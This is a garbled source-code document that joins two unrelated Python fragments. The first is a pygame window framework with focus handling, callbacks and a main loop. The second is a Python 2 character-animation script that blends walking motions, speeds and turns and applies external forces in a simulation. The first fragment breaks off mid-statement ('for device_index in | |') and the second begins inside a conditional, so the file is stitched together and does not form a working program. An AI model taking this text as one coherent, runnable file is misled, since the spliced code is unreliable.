self.__callback(*self.__args, **self.__kwargs)
self.kill()
def kill(self) -> None:
self.__master.remove_window_callback(self)
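# Typical flow (illustrative): a WindowCallback is created with a wait time and
# polled every frame through WindowCallbackList.process(); once its Clock reports
# the wait time as elapsed, the callback fires once and removes itself from its
# master window via kill().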
class WindowCallbackList(list):
def process(self) -> None:
if not self:
return
callback_list = self.copy()
for callback in callback_list:
callback()
class WindowDrawableList(DrawableList):
def __init__(self):
super().__init__()
self.__index = -1
def remove(self, *obj_list: Drawable) -> None:
super().remove(*obj_list)
self.__update_index()
def remove_from_index(self, index: int) -> None:
super().remove_from_index(index)
self.__update_index()
def clear(self) -> None:
super().clear()
self.__index = -1
def __update_index(self) -> None:
self.__index = min(self.__index, len(self.__get_all_focusable()) - 1)
def focus_get(self) -> Focusable:
if self.__index < 0:
return None
return self.__get_all_focusable()[self.__index]
def focus_next(self) -> None:
focusable_list = self.__get_all_focusable()
if any(obj.take_focus() for obj in focusable_list):
size = len(focusable_list)
while True:
self.__index = (self.__index + 1) % size
obj = self.focus_get()
if obj.take_focus() and not isinstance(obj, GridCell):
break
self.set_focus(obj)
else:
self.set_focus(None)
def focus_obj_on_side(self, side: str) -> None:
actual_obj = self.focus_get()
if actual_obj is None:
self.focus_next()
else:
obj = actual_obj.get_obj_on_side(side)
while obj and not obj.take_focus():
obj = obj.get_obj_on_side(side)
if obj:
self.set_focus(obj)
def set_focus(self, obj: Focusable) -> None:
focusable_list = self.__get_all_focusable()
if obj is not None and obj not in focusable_list:
return
for obj_f in focusable_list:
obj_f.on_focus_leave()
if isinstance(obj, Focusable):
self.__index = focusable_list.index(obj)
obj.on_focus_set()
else:
self.__index = -1
def focus_mode_update(self) -> None:
if not Focusable.actual_mode_is(Focusable.MODE_MOUSE) and self.focus_get() is None:
self.focus_next()
@property
def index(self) -> int:
return self.__index
def __get_all_focusable(self) -> Sequence[Focusable]:
obj_list = list()
for obj in self:
if isinstance(obj, Focusable):
obj_list.append(obj)
if isinstance(obj, (DrawableList, Grid)):
if isinstance(obj, Grid):
obj_list.extend(obj.cells)
obj_list.extend(obj.find_objects(Focusable))
return obj_list
class WindowDrawable(Drawable):
pass
class WindowTransition:
def hide_actual_looping_window_start_loop(self, window) -> None:
pass
def show_new_looping_window(self, window) -> None:
pass
def hide_actual_looping_window_end_loop(self, window) -> None:
pass
def show_previous_window_end_loop(self, window) -> None:
pass
class MetaWindow(type):
__namespaces = dict()
def __init__(cls, name, bases, dict_) -> None:
type.__init__(cls, name, bases, dict_)
MetaWindow.set_namespace_decorator(cls)
def __call__(cls, *args, **kwargs):
obj = type.__call__(cls, *args, **kwargs)
MetaWindow.__namespaces[obj] = ThemeNamespace.get()
return obj
def set_namespace_decorator(cls):
for name, obj in filter(lambda item: callable(item[1]), vars(cls).items()):
setattr(cls, name, MetaWindow.namespace_decorator(obj))
@staticmethod
def namespace_decorator(func):
@wraps(func)
def wrapper(window, *args, **kwargs):
if window not in MetaWindow.__namespaces:
return func(window, *args, **kwargs)
with ThemeNamespace(MetaWindow.__namespaces[window]):
output = func(window, *args, **kwargs)
return output
return wrapper
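# Effect of the metaclass (illustrative; MyWindow is a hypothetical subclass):
#     with ThemeNamespace("menu"):
#         window = MyWindow()   # the "menu" namespace is recorded for this window
#     window.mainloop()         # every method call re-enters ThemeNamespace("menu")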
class Window(metaclass=MetaWindow):
MIXER_FREQUENCY = 44100
MIXER_SIZE = -16
MIXER_CHANNELS = 2
MIXER_BUFFER = 512
__main_window = None
__fake_screen = pygame.Surface((0, 0))
__resources = Resources()
__default_key_repeat = (0, 0)
__text_input_enabled = False
__all_opened = list()
__actual_looping_window = None
__sound_volume = 50
__music_volume = 50
__enable_music = True
__enable_sound = True
__actual_music = None
__show_fps = False
__fps = 60
__fps_obj = None
__joystick = JoystickList()
__keyboard = Keyboard()
__default_cursor = Cursor(pygame.SYSTEM_CURSOR_ARROW)
__cursor = __default_cursor
__all_window_event_handler_dict = dict()
__all_window_key_handler_dict = dict()
__all_window_key_state_dict = dict()
__all_window_joystick_handler_dict = dict()
__all_window_joystick_state_dict = dict()
__all_window_mouse_handler_list = list()
__all_window_key_enabled = True
__server_socket = ServerSocket()
__client_socket = ClientSocket()
def __init__(self, master=None, bg_color=BLACK, bg_music=None):
self.__master = master
self.__main_clock = pygame.time.Clock()
self.__loop = False
self.__show_fps_in_this_window = True
self.__objects = WindowDrawableList()
self.__automatic_add_drawable_to_object_list = True
self.__event_handler_dict = dict()
self.__key_handler_dict = dict()
self.__key_state_dict = dict()
self.__joystick_handler_dict = dict()
self.__joystick_state_dict = dict()
self.__mouse_handler_list = list()
self.__callback_after = WindowCallbackList()
self.bg_color = bg_color
self.bg_music = bg_music
focus_event = (
pygame.KEYDOWN,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEMOTION,
pygame.MOUSEWHEEL,
pygame.JOYHATMOTION
)
self.bind_multiple_event(focus_event, self.__handle_focus)
self.bind_event(pygame.KEYDOWN, self.__key_handler)
self.bind_multiple_event([pygame.JOYBUTTONDOWN, pygame.JOYAXISMOTION, pygame.JOYHATMOTION], self.__joystick_handler)
self.__key_enabled = True
self.__screenshot = None
self.__screenshot_window_callback = None
self.bind_key(pygame.K_F11, lambda event: self.screenshot())
if not Window.__fps_obj:
Window.__fps_obj = Text(color=BLUE)
@property
def main_window(self) -> bool:
return Window.__main_window is self
@staticmethod
def get_actual_window():
return Window.__actual_looping_window
@property
def joystick(self) -> JoystickList:
return Window.__joystick
@property
def keyboard(self) -> Keyboard:
return Window.__keyboard
@property
def objects(self) -> WindowDrawableList:
return self.__objects
def __setattr__(self, name, obj) -> None:
automatic_add = getattr(self, "_Window__automatic_add_drawable_to_object_list", True)
if name != "_Window__objects" and hasattr(self, "_Window__objects") and automatic_add:
if hasattr(self, name) and isinstance(getattr(self, name), DrawableList.get_valid_classes()):
self.objects.remove(getattr(self, name))
if isinstance(obj, DrawableList.get_valid_classes()) and not isinstance(obj, (WindowDrawable, WindowDrawableList)):
self.objects.add(obj)
return object.__setattr__(self, name, obj)
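# Consequence of the attribute hooks (illustrative): assigning a drawable to an
# attribute, e.g. self.title = Text(...), automatically adds it to self.objects,
# while re-assigning or deleting the attribute removes the previous drawable.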
def __delattr__(self, name) -> None:
obj = getattr(self, name)
if isinstance(obj, DrawableList.get_valid_classes()) and name != "_Window__objects":
self.objects.remove(obj)
return object.__delattr__(self, name)
def __contains__(self, obj) -> bool:
return bool(obj in self.objects)
@contextmanager
def no_add_object_automatically(self) -> None:
try:
self.__automatic_add_drawable_to_object_list = False
yield self
finally:
self.__automatic_add_drawable_to_object_list = True
def enable_key_joy_focus(self) -> None:
self.__key_enabled = True
def disable_key_joy_focus(self) -> None:
self.__key_enabled = False
@staticmethod
def enable_key_joy_focus_for_all_window() -> None:
Window.__all_window_key_enabled = True
@staticmethod
def disable_key_joy_focus_for_all_window() -> None:
Window.__all_window_key_enabled = False
@staticmethod
def set_icon(icon: pygame.Surface) -> None:
pygame.display.set_icon(pygame.transform.smoothscale(icon, (32, 32)))
@staticmethod
def set_title(title: str) -> None:
pygame.display.set_caption(title)
@staticmethod
def iconify() -> bool:
return pygame.display.iconify()
@property
def bg_music(self) -> Union[str, None]:
return self.__bg_music
@bg_music.setter
def bg_music(self, music) -> None:
if music is None or os.path.isfile(music):
self.__bg_music = music
@property
def bg_color(self) -> pygame.Color:
return self.__bg_color
@bg_color.setter
def bg_color(self, color: pygame.Color) -> None:
self.__bg_color = pygame.Color(color) if color is not None else BLACK
@property
def loop(self) -> bool:
return self.__loop
def mainloop(self, *, transition: Optional[WindowTransition] = None,
action_before_loop: Optional[Callable[..., Any]] = None,
action_after_loop: Optional[Callable[..., Any]] = None) -> int:
self.__loop = True
Animation.enable()
if not isinstance(Window.__main_window, Window):
Window.__main_window = self
Window.__all_opened.append(self)
Window.__default_cursor.set()
previous_window = Window.get_actual_window()
if isinstance(transition, WindowTransition) and isinstance(previous_window, Window):
transition.hide_actual_looping_window_start_loop(previous_window)
if callable(action_before_loop):
action_before_loop()
self.place_objects()
self.set_grid()
self.on_start_loop()
if isinstance(transition, WindowTransition) and self.__loop:
transition.show_new_looping_window(self)
while self.__loop:
self.handle_fps()
Window.__actual_looping_window = self
self.__handle_bg_music()
self.__handle_cursor()
self.__callback_after.process()
if Window.__all_window_key_enabled and self.__key_enabled:
self.objects.focus_mode_update()
self.keyboard.update()
self.update()
self.draw_and_refresh()
self.event_handler()
self.__callback_after.clear()
if self.main_window:
Window.__main_window = None
if pygame.get_init():
if isinstance(transition, WindowTransition):
transition.hide_actual_looping_window_end_loop(Window.get_actual_window())
if callable(action_after_loop):
action_after_loop()
if isinstance(transition, WindowTransition) and isinstance(previous_window, Window):
transition.show_previous_window_end_loop(previous_window)
elif callable(action_after_loop):
action_after_loop()
return 0
def stop(self, force=False, sound=None) -> None:
if not self.__loop:
return
self.__loop = False
if sound:
self.play_sound(sound)
if force or self.main_window or self.__actual_looping_window is not self:
Animation.disable()
self.on_quit()
self.set_focus(None)
Window.__all_opened.remove(self)
if force and not self.main_window and isinstance(Window.__main_window, Window):
Window.__main_window.stop()
elif self.main_window:
for window in list(Window.__all_opened):
Animation.disable()
window.stop()
Animation.enable()
if not Window.__all_opened and pygame.get_init():
Window.stop_connection()
pygame.quit()
raise WindowExit
def close(self) -> None:
self.stop(force=True)
def on_quit(self) -> None:
pass
def on_start_loop(self) -> None:
pass
def update(self) -> None:
pass
def place_objects(self) -> None:
pass
def set_grid(self) -> None:
pass
def draw_screen(self, show_fps=True) -> None:
if isinstance(self.__master, Window):
self.__master.draw_screen(show_fps=False)
else:
self.surface.fill(self.bg_color)
self.objects.draw(self.surface)
if Window.__show_fps is True and show_fps and self.__show_fps_in_this_window:
Window.__fps_obj.draw(self.surface)
if isinstance(self.__screenshot, Drawable):
self.__screenshot.draw(self.surface)
pygame.draw.rect(self.surface, WHITE, self.__screenshot.rect, width=3)
def refresh(self, pump=False) -> None:
screen = pygame.display.get_surface()
screen.blit(pygame.transform.smoothscale(self.surface, screen.get_size()), (0, 0))
pygame.display.flip()
if pump:
repost_event = list[pygame.event.Event]()
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.close()
else:
repost_event.append(event)
for event in repost_event:
pygame.event.post(event)
def draw_and_refresh(self, show_fps=True, pump=False) -> None:
self.draw_screen(show_fps=show_fps)
self.refresh(pump=pump)
@staticmethod
def set_fps(framerate: int) -> None:
Window.__fps = int(framerate)
@staticmethod
def get_fps() -> int:
return Window.__fps
@staticmethod
def show_fps(status: bool, **kwargs) -> None:
Window.__show_fps = bool(status)
if kwargs:
Window.move_fps_object(**kwargs)
@staticmethod
def config_fps_obj(**kwargs) -> None:
Window.__fps_obj.config(**kwargs)
@staticmethod
def move_fps_object(**kwargs) -> None:
Window.__fps_obj.move(**kwargs)
@staticmethod
def fps_is_shown() -> bool:
return Window.__show_fps
def handle_fps(self) -> None:
self.__main_clock.tick(Window.__fps)
if Window.__show_fps:
Window.__fps_obj.message = f"{round(self.__main_clock.get_fps())} FPS"
def show_fps_in_this_window(self, status: bool) -> None:
self.__show_fps_in_this_window = bool(status)
def show_all(self, without=list()) -> None:
for obj in filter(lambda obj: obj not in without, self.objects):
obj.show()
for obj in without:
obj.hide()
def hide_all(self, without=list()) -> None:
for obj in filter(lambda obj: obj not in without, self.objects):
obj.hide()
for obj in without:
obj.show()
def event_handler(self) -> None:
for key_state_dict in [Window.__all_window_key_state_dict, self.__key_state_dict]:
for key_value, callback_list in key_state_dict.items():
for callback in callback_list:
callback(key_value, self.keyboard.is_pressed(key_value))
mouse_pos = self.map_cursor_position(pygame.mouse.get_pos())
for mouse_handler_list in [Window.__all_window_mouse_handler_list, self.__mouse_handler_list]:
for callback in mouse_handler_list:
callback(mouse_pos)
for joystick_state_dict in [Window.__all_window_joystick_state_dict, self.__joystick_state_dict]:
for device_index in | |
0:
if old_style[0] != style[0]:
#need a blending
if old_style[0] == 1:
if which_foot[0] == 0:
motion_info[0].append('left_left_style1')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style1, left_left_normal,left_left_style1[0],None)
else :
motion_info[0].append('right_right_style1')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style1, right_right_normal,right_right_style1[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
elif old_style[0] == 2:
if which_foot[0] == 0:
motion_info[0].append('left_left_style2')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style2, left_left_normal,left_left_style2[0],None)
else :
motion_info[0].append('right_right_style2')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style2, right_right_normal,right_right_style2[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
elif old_style[0] == 3:
if which_foot[0] == 0:
motion_info[0].append('left_left_style3')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style3, left_left_normal,left_left_style3[0],None)
else :
motion_info[0].append('right_right_style3')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style3, right_right_normal,right_right_style3[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
#left_foot
if which_foot[0] == 0:
if old_speed[0] != speed[0]:
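# Speed change (illustrative reading of the code below): build two normal<->fast
# blends, one at the old speed ratio and one at the new one (speed in [0, 10]
# mapped to [0, 1] via 0.1*speed), then blend between those blends for a smooth
# velocity transition.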
blend1 = ymb.getBlendedNextMotion2(left_left_normal, left_left_fast,left_left_normal[0],0.1*old_speed[0])
blend2 = ymb.getBlendedNextMotion2(left_left_normal, left_left_fast,left_left_normal[0],0.1*speed[0])
blend_motion = ymb.getBlendedNextMotion2( blend1,blend2,blend1[0],None)
motion_info[0].append('left_left_normal')
motion_info[0].append('left_left_fast')
motion_info[0].append(0.1*old_speed[0])
motion_info[0].append(0.1*speed[0])
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if speed[0]== 0 :
motion_info[1].append('left_right_normal')
next_motion[:] = left_right_normal.copy()
elif speed[0] == 10:
motion_info[1].append('left_right_fast')
next_motion[:] = left_right_fast.copy()
else:
motion_info[1].append('left_right_normal')
motion_info[1].append('left_right_fast')
motion_info[1].append(0.1*speed[0])
next_motion[:] = ymb.getBlendedNextMotion2(left_right_normal, left_right_fast,left_right_normal[0],0.1*speed[0])
which_foot[0] = 1
# right_foot
else:
if old_speed[0] != speed[0]:
blend1 = ymb.getBlendedNextMotion2(right_right_normal, right_right_fast,right_right_normal[0],0.1*old_speed[0])
blend2 = ymb.getBlendedNextMotion2(right_right_normal, right_right_fast,right_right_normal[0],0.1*speed[0])
blend_motion = ymb.getBlendedNextMotion2( blend1,blend2,blend1[0],None)
# tmp_motion = ymb.getStitchedNextMotion(blend_motion,result_motion[finished_frame-1],10)
motion_info[0].append('right_right_normal')
motion_info[0].append('right_right_fast')
motion_info[0].append(0.1*old_speed[0])
motion_info[0].append(0.1*speed[0])
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if speed[0]== 0 :
motion_info[1].append('right_left_normal')
next_motion[:] = right_left_normal.copy()
elif speed[0] == 10:
motion_info[1].append('right_left_fast')
next_motion[:] = right_left_fast.copy()
else:
motion_info[1].append('right_left_normal')
motion_info[1].append('right_left_fast')
motion_info[1].append(0.1*speed[0])
next_motion[:] = ymb.getBlendedNextMotion2(right_left_normal, right_left_fast,right_left_normal[0],0.1*speed[0])
which_foot[0] = 0
# angle change
else:
relative_angle[0] = 0
pre_velocity[0] = velocity[0]
if cross_vector[0] > 0 :
print tmp_angle[0], 'left'
if which_foot[0] == 1:
# result_motion.extend(ymb.getStitchedNextMotion(right_left_normal,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion(right_left_normal,result_motion[last_time_frame-1],TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
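# Left-turn clip selection (illustrative): blend between the two turning clips
# that bracket tmp_angle, e.g. a 60-degree turn blends normal_long with the
# 90-degree clip at weight 60/90; 90-135 and 135-180 degrees blend the
# respective neighboring clips.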
if tmp_angle[0] < 90:
motion_info[1].append('left_right_normal_long')
motion_info[1].append('left_right_90_leftturning')
motion_info[1].append((tmp_angle[0])/90.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_normal_long,left_right_90_leftturning,left_right_normal_long[0],(tmp_angle[0])/90.0)
elif tmp_angle[0] == 90:
motion_info[1].append('left_right_90_leftturning')
next_motion[:] = left_right_90_leftturning.copy()
# elif tmp_angle[0] < 135:
# next_motion[:] = ymb.getBlendedNextMotion2(left_right_walk_90_left_motion,left_right_walk_135_left_motion,left_right_normal_long[0],(tmp_angle[0])/45.0)
elif tmp_angle[0] < 135:
motion_info[1].append('left_right_90_leftturning')
motion_info[1].append('left_right_135_leftturning')
motion_info[1].append((tmp_angle[0]-90)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_90_leftturning,left_right_135_leftturning,left_right_90_leftturning[0],(tmp_angle[0]-90)/45.0)
elif tmp_angle[0] == 135:
motion_info[1].append('left_right_135_leftturning')
next_motion[:] = left_right_135_leftturning.copy()
elif tmp_angle[0] < 180:
motion_info[1].append('left_right_135_leftturning')
motion_info[1].append('left_right_180_leftturning')
motion_info[1].append((tmp_angle[0]-135)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_135_leftturning,left_right_180_leftturning,left_right_135_leftturning[0],(tmp_angle[0]-135)/45.0)
else:
motion_info[1].append('left_right_180_leftturning')
next_motion[:] = left_right_180_leftturning.copy()
which_foot[0] = 1
#left_right_45_leftturning
next_angle_offset += tmp_angle[0]
else:
print tmp_angle[0], 'right'
if which_foot[0] == 0:
# result_motion.extend(ymb.getStitchedNextMotion(left_right_normal,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion(left_right_normal,result_motion[last_time_frame-1],TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if tmp_angle[0] < 90:
motion_info[1].append('right_left_normal_long')
motion_info[1].append('right_left_90_rightturning')
motion_info[1].append((tmp_angle[0])/90.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_normal_long,right_left_90_rightturning,right_left_normal_long[0],(tmp_angle[0])/90.0)
elif tmp_angle[0] == 90:
motion_info[1].append('right_left_90_rightturning')
next_motion[:] = right_left_90_rightturning.copy()
# elif tmp_angle[0] < 135:
# next_motion[:] = ymb.getBlendedNextMotion2(left_right_walk_90_left_motion,left_right_walk_135_left_motion,left_right_normal_long[0],(tmp_angle[0])/45.0)
elif tmp_angle[0] < 135:
motion_info[1].append('right_left_90_rightturning')
motion_info[1].append('right_left_135_rightturning')
motion_info[1].append((tmp_angle[0]-90)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_90_rightturning,right_left_135_rightturning,right_left_90_rightturning[0],(tmp_angle[0]-90)/45.0)
elif tmp_angle[0] == 135:
motion_info[1].append('right_left_135_rightturning')
next_motion[:] = right_left_135_rightturning.copy()
elif tmp_angle[0] < 180:
motion_info[1].append('right_left_135_rightturning')
motion_info[1].append('right_left_180_rightturning')
motion_info[1].append((tmp_angle[0]-135)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_135_rightturning,right_left_180_rightturning,right_left_135_rightturning[0],(tmp_angle[0]-135)/45.0)
else:
motion_info[1].append('right_left_180_rightturning')
next_motion[:] = right_left_180_rightturning.copy()
which_foot[0] = 0
next_angle_offset += -tmp_angle[0]
pre_angle[0] = 0
viewer.objectInfoWnd.angle_value_input.value(0)
viewer.objectInfoWnd.angle_value_slider.value(0)
# if draw_angle[0] >= 360:
# draw_angle[0] = draw_angle[0] -360
# tmp_motion.extend(ymb.getStitchedNextMotion(next_motion,tmp_motion[-1],10))
# result_motion.extend(ymb.getStitchedNextMotion(next_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(next_motion,result_motion[last_time_frame-1], start_motion[0][0], angle_offset[0]*mm.RAD, 10))
angle_offset[0] += next_angle_offset
for finished_frame in range(finished_frame,len(result_motion)+1):
# print style[0]
which_style[finished_frame-1] = style[0]
viewer.setMaxFrame(10000)
# viewer.setMaxFrame(len(result_motion))
total_frame_num[0] = len(result_motion)
old_speed[0] = speed[0]
old_style[0] = style[0]
#
#
return result_motion[call_time_frame:], motion_info
pre_angle = [0]
moving_angle = ['off']
def style_but_cb(which):
style[0] = which
def speed_but_cb(which):
speed[0] = which
def val_slider_handle(which):
moving_angle[0] = which
# print '1: ' ,moving_angle[0]
if moving_angle[0]== 'on':
relative_angle[0] = 0
elif moving_angle[0]== 'off':
relative_angle[0] = 1
def angle_but_cb_handle(which):
angle[0] = which
draw_angle[0] -= pre_angle[0]
draw_angle[0] += angle[0]
pre_angle[0] = angle[0]
def angle_but_cb(which):
# relative_angle[0] = 1
# angle[0] = which
# draw_angle[0] += angle[0]
# if draw_angle[0] >= 360:
# draw_angle[0] = draw_angle[0] -360
if which == 270:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(-FORCE_SIZE[0], 0, 0), spine))
elif which== 90:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(FORCE_SIZE[0], 0, 0), spine))
elif which == 180:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(0, 0, -FORCE_SIZE[0]), spine))
elif which == 0:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(0, 0, FORCE_SIZE[0]), spine))
# else:
#
# relative_angle[0] = 1
# angle[0] = which
# draw_angle[0] -= pre_angle[0]
# draw_angle[0] += angle[0]
# pre_angle[0] = angle[0]
FORCE_SIZE = [LARGE_FORCE_SIZE]
x_axis = [0]
z_axis = [0]
def event_handle(which_key):
#6 : speed up 7: speed down
if which_key == 1:
# print speed
speed[0]+= 2
if speed[0] > 10:
speed[0] = 0
elif which_key == 2:
# print speed
speed[0]-= 2
if speed[0] < 0:
speed[0] = 10
# external force
elif which_key == 'a':
x_axis[0] += 0.3
elif which_key == 'd':
x_axis[0] -= 0.3
elif which_key == 'w':
z_axis[0] += 0.3
elif which_key == 's':
z_axis[0] -= 0.3
elif which_key == 'l':
if FORCE_SIZE[0]== LARGE_FORCE_SIZE:
print '2'
FORCE_SIZE[0]= SMALL_FORCE_SIZE
# arrow_force.ratio = 0.01
else:
print '1'
FORCE_SIZE[0]=LARGE_FORCE_SIZE
# arrow_force.ratio = 0.005
def make_motion_seq(now_frame_num):
if now_frame_num > 0 :
make_motion_seq_after_0_frame(now_frame_num)
root_frame = [None]
def make_motion_seq_after_0_frame(now_frame_num):
root_frame[0] = result_motion[now_frame_num-1].getJointFrame(0)
if SIMULATION_ON:
direction[0] = controlModel.getJointPositionGlobal(0)
else:
# viewer.setCameraTarget(result_motion[now_frame_num-1].getJointPositionGlobal(0))
direction[0] = result_motion[now_frame_num-1].getJointPositionGlobal(0)
viewer.motionViewWnd.glWindow.floor_axis[0] = direction[0]
arrow_origin = direction[0]
x = -0.7
z = 0
if store_angle_per_frame[now_frame_num-1] == -1:
store_angle_per_frame[now_frame_num-1] = draw_angle[0]
x1 = z*math.sin(store_angle_per_frame[now_frame_num-1]*math.pi/180) + x*math.cos(store_angle_per_frame[now_frame_num-1]*math.pi/180)
z1 = z*math.cos(store_angle_per_frame[now_frame_num-1]*math.pi/180) - x*math.sin(store_angle_per_frame[now_frame_num-1]*math.pi/180)
tmp[0] = [x1,0,z1]
arrow_origin = direction[0] + tmp
direction[0] = arrow_origin[0]
direction[0][1] = ARROW_HEIGHT
if store_speed_per_frame[now_frame_num-1] == -1:
store_speed_per_frame[now_frame_num-1] = speed[0]
x = -(store_speed_per_frame[now_frame_num-1]*0.1 + 0.5)
z = 0
x1 = z*math.sin((store_angle_per_frame[now_frame_num-1])*math.pi/180) + x*math.cos((store_angle_per_frame[now_frame_num-1])*math.pi/180)
z1 = z*math.cos((store_angle_per_frame[now_frame_num-1])*math.pi/180) - x*math.sin((store_angle_per_frame[now_frame_num-1])*math.pi/180)
velocity[0] = [x1,0,z1]
if now_frame_num == 1 :
pre_velocity[0] = velocity[0]
velocity_root[0] = result_motion.getJointVelocityGlobal(0, now_frame_num-1)
velocity_root[0] = pre_velocity[0]
velocity_root[0][1] = velocity[0][1]
dot_product = velocity[0][0] *velocity_root[0][0] +velocity[0][1] *velocity_root[0][1] +velocity[0][2] *velocity_root[0][2]
len1 = math.sqrt(velocity[0][0] *velocity[0][0] +velocity[0][1] *velocity[0][1] +velocity[0][2] *velocity[0][2])
len2 = math.sqrt(velocity_root[0][0] *velocity_root[0][0] +velocity_root[0][1] *velocity_root[0][1] +velocity_root[0][2] *velocity_root[0][2])
if dot_product/(len1*len2) >= 1.:
tmp_angle[0] = math.acos( 1.)
elif dot_product/(len1*len2) <= -1.:
tmp_angle[0] = math.acos( -1.)
else :
tmp_angle[0] = math.acos( dot_product/(len1*len2))
tmp_angle[0] = tmp_angle[0]*180/math.pi
cross_vector[0] = velocity_root[0][2]*velocity[0][0] - velocity_root[0][0]*velocity[0][2]
if which_style[now_frame_num-1] == 1:
arrow_color.totalColor = (85,107,47)
elif which_style[now_frame_num-1] == 2:
arrow_color.totalColor = (72,61,139)
elif which_style[now_frame_num-1] == 3:
arrow_color.totalColor = (139,69,19)
else :
if moving_angle[0] == 'on':
# arrow_color.totalColor = (75+100,0+100,130+100)
arrow_color.totalColor = ARROW_MOVING_COLOR
elif moving_angle[0] == 'off':
# arrow_color.totalColor =(75,0,130)
arrow_color.totalColor = ARROW_FIXED_COLOR
if not SIMULATION_ON:
if now_frame_num > total_frame_num[0]-1:
call_motionstitch_time(now_frame_num)
if SIMULATION_ON:
if SCREEN_SHOT:
viewer = ysv.SimpleViewer([150,50,800*2+180,600*2+55])
else:
viewer = ysv.SimpleViewer([150,50,800+180,600+55])
else:
viewer = ysv.SimpleViewer()
viewer.setCameraTarget(result_motion[0].getJointPositionGlobal(0))
viewer.objectInfoWnd.angle_value_slider.val_slider_handle = val_slider_handle
viewer.objectInfoWnd.angle_but_cb_handle = angle_but_cb_handle
viewer.objectInfoWnd.angle_but_cb = angle_but_cb
viewer.objectInfoWnd.speed_but_cb = speed_but_cb
viewer.objectInfoWnd.style_but_cb = style_but_cb
viewer.motionViewWnd.glWindow.event_handle = event_handle
viewer.motionViewWnd.make_motion_seq = make_motion_seq
#===============================================================================
#===============================================================================
#===============================================================================
# # # interactive_control
#===============================================================================
#===============================================================================
#===============================================================================
#def interactive_control():
class ForceInfo:
def __init__(self, startFrame, duration, force, targetBody):
self.startFrame = startFrame # frame
self.duration = duration # sec
self.force = force # Newton
self.targetBody = targetBody
#===============================================================================
# load motion
#===============================================================================
c_swf_offset = -.025
# c_swf_offset = .01
# c_swf_offset = .005
K_stp_pos = 0.
# c5 = .5; c6 = .01
c5 = .5; c6 = .02
# c5 = .5; c6 = .05
# c5 = 1.; c6 = .05
# c5 = .0; c6 = .0
K_stb_vel = .1
K_stb_pos = .1
OLD_SWING_HEIGHT = False
# OLD_SWING_HEIGHT = True
HIGHER_OFFSET = True
# HIGHER_OFFSET = False
dir = './icmotion_last/'
MULTI_VIEWER = False
CAMERA_TRACKING = True
# global parameters
# Kt = 20.; Dt = 2*(Kt**.5)
# Ks = 2000.; Ds = 2*(Ks**.5)
Kt = 20.; Dt = 2*(Kt**.5)
Ks = 2000.; Ds = 2*(Ks**.5)
mu = 2.
# constants
c_min_contact_vel = 100.
c_min_contact_time = .7
c_landing_duration = .2
c_taking_duration = .3
c_swf_mid_offset = .07
# c_swf_mid_offset = .05
# c_swf_stability = .5
# c_swf_stability = .0
c_locking_vel = .05
# K_stb_vel = .1
# K_stp_pos = 0.
# default_K_swp_pos_sag_faster = .05
# K_stb_pos = .0
paramd = {}
# paramd['start'] = {'K_swp_vel_sag':.1, 'K_swp_vel_cor':.4, 'K_swp_pos_sag':1., 'K_swp_pos_cor':0.}
paramd['start'] = {'K_swp_vel_sag':.1, 'K_swp_vel_cor':.25, 'K_swp_pos_sag':1., 'K_swp_pos_cor':.3, 'K_swp_pos_sag_faster':.05}
